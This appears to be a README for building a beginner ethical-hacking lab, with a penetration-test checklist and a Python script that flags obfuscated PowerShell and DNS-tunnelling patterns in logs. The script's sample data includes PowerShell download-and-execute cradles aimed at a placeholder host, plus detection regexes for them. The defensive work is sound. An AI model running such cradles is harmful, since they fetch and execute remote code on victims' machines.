steveschofield/build-beginner-ethical-hacking-environment

Build a Beginner Ethical Hacking Environment

Begin your Ethical Hacking journey. This documentation shares tips and free software you can use to get started. There are several tutorials, and AI can also assist, to help you set up an environment and learn the craft. It is an exciting, frustrating and challenging process, but a rewarding one.

Students and individuals have asked, "How do I get started?"

Checklist for setting up your own environment.

Automated server building using Vagrant by Hashicorp, embedded vulnerable container apps

My YouTube Channel

  • YouTube channel with videos on building environments and other things I have become obsessed with.

YouTube videos to get started, in order

Misc Pentesting steps

Part of a penetration test is checking for malware and the vulnerabilities it exploits. When performing a penetration test, the penetration tester works through a set of steps:

  1. Scan for open ports.
  2. Scan for running processes.
  3. Check for suspicious or unknown registry entries.
  4. Verify all running Windows services.
  5. Check startup programs.
  6. Look through the event log for suspicious events.
  7. Verify all installed programs.
  8. Scan files and folders for manipulation.
  9. Verify that device drivers are legitimate.
  10. Check all network and DNS settings and activity.
  11. Scan for suspicious API calls.
  12. Run anti-malware scans.
  13. Document results and findings.
  14. Run a full TCP port sweep with masscan to quickly identify exposed services at scale.
  15. Validate masscan findings with nmap -sV -sC to confirm versions and default script results.
  16. Use nmap -O and service fingerprinting to identify unexpected operating systems and hosts.
  17. Run targeted nmap NSE vulnerability checks (for SMB, RDP, HTTP, SSL/TLS, and DNS).
  18. Use nmap UDP scans (-sU) for high-risk services like DNS, SNMP, and NTP.
  19. Identify weak TLS ciphers and certificate issues on exposed HTTPS services.
  20. Check SMB shares, signing settings, and anonymous access exposures.
  21. Audit RDP and SSH hardening (MFA, lockout policy, weak auth settings, legacy protocol support).
  22. Enumerate local admins and privileged groups for unauthorized or stale accounts.
  23. Verify scheduled tasks and cron jobs for persistence mechanisms and suspicious commands.
  24. Inspect PowerShell logs and command history for encoded or obfuscated execution patterns.
  25. Baseline outbound connections and detect beaconing to unknown IPs/domains.
  26. Inspect DNS query logs for tunneling patterns, DGA-like domains, and unusual record types.
  27. Check endpoint security controls (EDR/AV/firewall) for tampering, disabled agents, or policy drift.
  28. Re-test remediated findings and record evidence (commands, output, timestamps, and risk ratings).
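For two of the log-inspection items above (24, encoded or obfuscated PowerShell execution, and 26, DNS tunnelling and DGA-like names), here is a small Python triage script. It is an added example, not code from this repository or its author. The command lines and DNS query lines it scans are constructed samples, `example.invalid` is a placeholder, and the scoring weights and thresholds (score of 3 or more, a 40-character label, 3.5 bits of entropy) are assumptions to tune against your own baseline.

```python
import base64
import math
import re
from collections import Counter

# ---- Item 24: encoded / obfuscated PowerShell in process-creation records ----

# Constructed payload, encoded at import time so the base64 decodes to exactly this text
# (-EncodedCommand takes base64 of UTF-16LE script); example.invalid is a placeholder host.
HYPOTHETICAL_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED_SAMPLE = base64.b64encode(HYPOTHETICAL_CRADLE.encode("utf-16-le")).decode()

# Constructed CommandLine fields in the shape of Event ID 4688 / Sysmon Event ID 1 records.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -w hidden -nop -enc " + ENCODED_SAMPLE,
    "pwsh -c \"Get-Service | Where-Object Status -eq 'Running'\"",
    "powershell.exe -c \"$u='http://example.invalid/y';IEX(New-Object Net.WebClient).DownloadString($u)\"",
]

# powershell.exe accepts abbreviated switches, so -e, -ec, -enc and -EncodedCommand all
# introduce a base64 script. Weighted indicators run over the raw line plus any decoded script.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_PATTERNS = {
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 3),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "hidden_window": (re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass": (re.compile(r"(?:^|\s)-nop\b|-ExecutionPolicy\s+Bypass", re.I), 1),
}

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command_line(cmdline):
    """Return (score, reasons, decoded_script) for one command line."""
    decoded = decode_encoded_command(cmdline)
    score, reasons = (2, ["encoded_command"]) if decoded is not None else (0, [])
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    for name, (pattern, weight) in SUSPICIOUS_PATTERNS.items():
        if pattern.search(text):
            score += weight
            reasons.append(name)
    return score, reasons, decoded

def flag_command_lines(lines, threshold=3):
    """Return [(cmdline, score, reasons)] for lines scoring at or above the threshold."""
    scored = [(line,) + score_command_line(line)[:2] for line in lines]
    return [(line, score, reasons) for line, score, reasons in scored if score >= threshold]

# ---- Item 26: tunnelling and DGA-like names in DNS query logs ----
# Constructed query-log lines, "<timestamp> <client> <qtype> <qname>"; not real traffic.
SAMPLE_DNS_LOG = """\
2024-05-01T09:00:01Z 10.0.0.12 A www.example.com
2024-05-01T09:00:02Z 10.0.0.12 AAAA mail.example.com
2024-05-01T09:00:03Z 10.0.0.40 TXT 6a5f1c9e0b2d7a3e4f8c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a.t.example.invalid
2024-05-01T09:00:04Z 10.0.0.40 A xk3q9vz7mwp2lr5t.invalid
2024-05-01T09:00:05Z 10.0.0.12 A cdn.example.org
"""

def shannon_entropy(s):
    """Bits per character; random-looking labels score near log2(alphabet size)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def analyze_dns_query(qtype, qname, label_len_threshold=40, entropy_threshold=3.5):
    """Return reason strings for one query; an empty list means nothing unusual."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return []
    reasons = []
    second_level, subdomain_labels = labels[-2], labels[:-2]  # crude: ignores the public-suffix list
    if max(len(lab) for lab in labels) >= label_len_threshold:
        reasons.append("long_label")                            # data carried inside a label
    if qtype.upper() in ("TXT", "NULL") and any(len(lab) >= 20 for lab in subdomain_labels):
        reasons.append("bulky_%s_query" % qtype.upper())        # record types tunnels favour
    if len(second_level) >= 12 and shannon_entropy(second_level) >= entropy_threshold:
        reasons.append("dga_like_domain")                       # long, high-entropy registrable label
    return reasons

def flag_dns_log(log_text):
    """Return [(client, qtype, qname, reasons)] for flagged queries, skipping malformed lines."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qtype, qname = parts
        reasons = analyze_dns_query(qtype, qname)
        if reasons:
            hits.append((client, qtype, qname, reasons))
    return hits

if __name__ == "__main__":
    print(*flag_command_lines(SAMPLE_COMMAND_LINES), sep="\n")
    print(*flag_dns_log(SAMPLE_DNS_LOG), sep="\n")
```

Run it directly to print the flagged entries, or import `flag_command_lines` and `flag_dns_log` and feed them exported 4688/Sysmon command lines and resolver query logs. The registrable-domain guess uses the last two labels only, so a production version would consult the public-suffix list, and the score for item 24 is meant to prioritise review, not to replace reading the decoded script.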
